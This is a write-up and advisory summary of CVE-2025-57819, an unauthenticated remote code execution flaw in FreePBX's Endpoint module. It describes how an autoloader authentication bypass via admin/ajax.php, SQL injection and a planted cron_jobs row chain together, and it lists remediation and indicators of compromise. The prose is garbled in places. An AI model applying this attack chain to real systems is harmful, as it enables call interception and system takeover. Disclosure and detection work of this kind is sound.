Full Report
FreePBX is a web-based GUI for managing the Asterisk VoIP phone system. The application is easily set up on a local network and is built on PHP. The ability to access this would result in the interception/stealing of phone calls, voicemails, etc. In August 2025, a FreePBX user started getting strange error messages in their access logs. A day later, a user found a file called .clean.sh on their box that was cleaning up after an exploit. This is a serious problem! This clearly indicated a remote code execution vulnerability. The WatchTower team had previously reported a post-auth RCE bug to the developers, who didn't care. This time they did. Why? This appeared to be an unauthenticated RCE vulnerability. Upon reviewing the vulnerability summary, it had to do with bad input validation. Command injection? SQL injection? Still not sure. But, they had a clue to go off of - the issue was in the Endpoint module. This was a plugin for FreePBX that simplified many aspects of the provisioning and management process. At first, they were looking for SSRFs because requests made from localhost bypassed authentication, but this did not work. After trying to call various modules with a single quote in the parameter, they were greeted with a nice SQL error! This led to a SQL injection that was obviously quite bad. This was still post auth though. Out of curiosity for the attacker, they set up a honeypot. After waiting for a little bit, a shiny new backdoor appeared on the system! This was calling /admin/ajax.php without authentication. But how? FreePBX contains a module/extension system to add to your PBX instance. To do this, the module parameter alongside the command is used for routing. Using reflection logic, it will determine if a class exists via class_exists in PHP. This will attempt to load a custom class from risk, in the case of a local system like this. In the custom PHP autoloader implementation, the function fpbx_framework_autoloader attempts to load the code. This will do some black magic to find the proper file to execute. In practice, this code allows for the execution of any PHP file with the appropriate part of an install. Specifying the module as FreePBX\\modules\\Endpoint\\install results in the install command to run, for instance. With the authentication bypass, it's not possible to exploit the SQL injection to gain access to the device! This results in a complete authentication bypass for some modules. In the patch, it was only the SQL injection that was fixed and not the authentication issue. This is a design-level issue that likely requires significant effort to resolve.
Analysis Summary
# Vulnerability: Unauthenticated Remote Code Execution in FreePBX Endpoint Module
## CVE Details
- **CVE ID:** CVE-2025-57819
- **CVSS Score:** 9.8 (Critical) - *Estimated based on unauthenticated RCE impact*
- **CWE:** CWE-89 (SQL Injection), CWE-287 (Improper Authentication)
## Affected Systems
- **Products:** FreePBX (Web-based GUI for Asterisk)
- **Versions:** Specific versions prior to the September 2025 patch.
- **Configurations:** Systems with the **Endpoint** module installed. The vulnerability leverages the FreePBX framework's autoloader logic which allows access to module classes via `ajax.php`.
## Vulnerability Description
The vulnerability is a multi-stage exploit involving an authentication bypass and a SQL injection.
1. **Authentication Bypass:** The FreePBX `fpbx_framework_autoloader` uses reflection logic (`class_exists`) to load classes based on the `module` parameter passed to `admin/ajax.php`. An attacker can specify a path such as `FreePBX\\modules\\Endpoint\\...` to invoke module classes directly without prior authentication.
2. **SQL Injection:** Inside the Endpoint module, the `brand` parameter (among others) in the `model` command lacks proper input validation. This allows an attacker to inject arbitrary SQL commands.
3. **Code Execution:** By exploiting the SQL injection, an attacker can insert a malicious row into the `cron_jobs` table. The FreePBX system's internal scheduler executes commands stored in this table, leading to Remote Code Execution (RCE) as the user running the PBX service.
## Exploitation
- **Status:** **Exploited in the wild.** Active mass exploitation was observed starting August 21, 2025.
- **Complexity:** Low
- **Attack Vector:** Network (Unauthenticated)
- **PoC Available:** Yes (A Detection Artefact Generator/Exploit script has been released by watchTowr Labs).
## Impact
- **Confidentiality:** Total (Access to call logs, voicemails, and audio interception).
- **Integrity:** Total (Ability to modify system files and plant backdoors).
- **Availability:** Total (Ability to crash the system or delete critical VoIP configurations).
## Remediation
### Patches
- Users must update the **FreePBX Endpoint module** via the Module Admin or `fwconsole ma upgrade endpoint`.
- *Note:* Initial reports indicate the patch addressed the SQL injection but did not fully resolve the underlying "design-level" authentication bypass logic in the autoloader.
### Workarounds
- Restrict access to the FreePBX `/admin` interface to trusted IP addresses only using a firewall or VPN.
- Disable or uninstall the Endpoint module if it is not actively required for phone provisioning.
## Detection
- **Indicators of Compromise (IoC):**
- Presence of a file named `.clean.sh` in the web root or home directories.
- Unexpected entries in the `cron_jobs` database table.
- Log entries in HTTP access logs showing requests to `admin/ajax.php` with the parameter `module=FreePBX\\modules\\Endpoint`.
- PHP fatal errors referencing `Symfony\Component\Console\Application` not found (often a side effect of botched exploitation).
- **Detection Methods:** Inspect the `asterisk` database: `SELECT * FROM cron_jobs;` and look for unrecognized shell commands.
## References
- watchTowr Labs Research: [https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/](https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/)
- FreePBX Community Discussion: [https://community.freepbx.org/t/107178](https://community.freepbx.org/t/107178)
- watchTowr PoC/DAG: [https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819](https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819)